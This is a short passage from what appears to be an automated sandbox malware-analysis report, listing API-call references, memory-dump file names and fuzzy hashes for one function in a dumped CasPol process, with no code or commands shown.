                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                          • free.MSVCRT ref: 00417425
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2605342592-0
                                                                                                                                                                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5